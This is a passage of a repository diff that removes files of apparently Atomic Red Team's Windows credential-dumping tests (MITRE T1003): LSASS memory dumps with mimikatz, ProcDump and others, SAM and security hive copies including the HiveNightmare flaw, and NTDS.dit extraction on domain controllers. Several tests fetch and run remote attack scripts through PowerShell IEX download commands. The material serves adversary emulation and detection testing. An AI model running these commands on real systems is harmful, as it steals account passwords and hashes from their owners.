Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
executor:
command: |
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8
description: |
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
pip install pypykatz
executor:
command: |
pypykatz live lsa
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Dump LSASS with .Net 5 createdump.exe
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\dotnet-lsass.dmp
createdump_exe:
description: Path of createdump.exe executable
type: Path
default: 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have createdump.exe from .Net 5
prereq_command: |
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
executor:
command: |
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
supported_platforms:
- windows
input_arguments:
xordump_exe:
description: Path to xordump
type: Path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
Computer must have xordump.exe
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
#{xordump_exe} -out #{output_file} -x 0x41
cleanup_command: |
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
atomics/T1003.002/T1003.002.md
-335
View File
@@ -1,335 +0,0 @@
# T1003.002 - OS Credential Dumping: Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Registry dump of SAM, creds, and secrets](#atomic-test-1---registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)
- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
- [Atomic Test #4 - PowerDump Hashes and Usernames from Registry](#atomic-test-4---powerdump-hashes-and-usernames-from-registry)
- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
<br/>
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live registry
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | String | SAM|
| copy_dest | Destination of the copied file | String | %temp%|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```
#### Cleanup Commands:
```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
<br/>
<br/>
## Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
```
#### Dependencies: Run with `powershell`!
##### Description: PowerDump script must exist on disk at specified location
##### Check Prereq Commands:
```powershell
if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
```
<br/>
<br/>
## Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | String | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | Integer | 10|
#### Attack Commands: Run with `command_prompt`!
```cmd
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
```
#### Cleanup Commands:
```cmd
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
```
<br/>
<br/>
## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
**Supported Platforms:** Windows
**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_hive | Hive you wish to dump | String | SAM|
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | Integer | 10|
#### Attack Commands: Run with `powershell`!
```powershell
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
#### Cleanup Commands:
```powershell
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
```
<br/>
<br/>
## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```
<br/>
atomics/T1003.002/T1003.002.yaml
-167
View File
@@ -1,167 +0,0 @@
attack_technique: T1003.002
display_name: "OS Credential Dumping: Security Account Manager"
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
supported_platforms:
- windows
executor:
command: |
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
cleanup_command: |
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
name: command_prompt
elevation_required: true
- name: Registry parse with pypykatz
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
description: |
Parses registry hives to obtain stored credentials
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
pip install pypykatz
executor:
command: |
pypykatz live registry
name: command_prompt
elevation_required: true
- name: esentutl.exe SAM copy
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
description: |
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path to the file to copy
type: Path
default: '%SystemRoot%/system32/config/SAM'
file_name:
description: Name of the copied file
type: String
default: SAM
copy_dest:
description: Destination of the copied file
type: String
default: '%temp%'
executor:
command: |
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
name: command_prompt
elevation_required: true
cleanup_command: |
del #{copy_dest}\#{file_name} >nul 2>&1
- name: PowerDump Hashes and Usernames from Registry
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hashes from the registry.
supported_platforms:
- windows
dependencies:
- description: PowerDump script must exist on disk at specified location
prereq_command: 'if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1} '
get_prereq_command: |-
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
executor:
command: |-
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
- name: dump volume shadow copy hives with certutil
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
description: |
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
supported_platforms:
- windows
input_arguments:
target_hive:
description: Hive you wish to dump
type: String
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: Integer
default: 10
executor:
command: |
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
name: command_prompt
elevation_required: false
cleanup_command: |
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
- name: dump volume shadow copy hives with System.IO.File
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
description: |
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
supported_platforms:
- windows
input_arguments:
target_hive:
description: Hive you wish to dump
type: String
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: Integer
default: 10
executor:
command: |
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
name: powershell
elevation_required: false
cleanup_command: |
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
- name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
name: powershell
atomics/T1003.003/T1003.003.md
-428
View File
@@ -1,428 +0,0 @@
# T1003.003 - OS Credential Dumping: NTDS
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
<blockquote>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Create Volume Shadow Copy with vssadmin](#atomic-test-1---create-volume-shadow-copy-with-vssadmin)
- [Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
- [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)
- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
<br/>
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands:
```cmd
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```cmd
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
```
##### Description: Extract path must exist
##### Check Prereq Commands:
```cmd
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
mkdir #{extract_path}
```
<br/>
<br/>
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Cleanup Commands:
```cmd
rmdir /q /s #{output_folder} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
## Atomic Test #4 - Create Volume Shadow Copy with WMI
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | String | C:&#92;|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
## Atomic Test #5 - Create Volume Shadow Copy remotely with WMI
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** d893459f-71f0-484d-9808-ec83b2b64226
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | String | C:&#92;|
| target_host | IP Address / Hostname you want to target | String | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
<br/>
<br/>
## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
**Supported Platforms:** Windows
**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_path | File to shadow copy | String | c:&#92;windows&#92;ntds&#92;ntds.dit|
| target_path | Target path of the result file | String | c:&#92;ntds.dit|
| target_host | IP Address / Hostname you want to target | String | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
<br/>
<br/>
## Atomic Test #7 - Create Volume Shadow Copy with Powershell
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:&#92;|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
```
<br/>
<br/>
## Atomic Test #8 - Create Symlink to Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
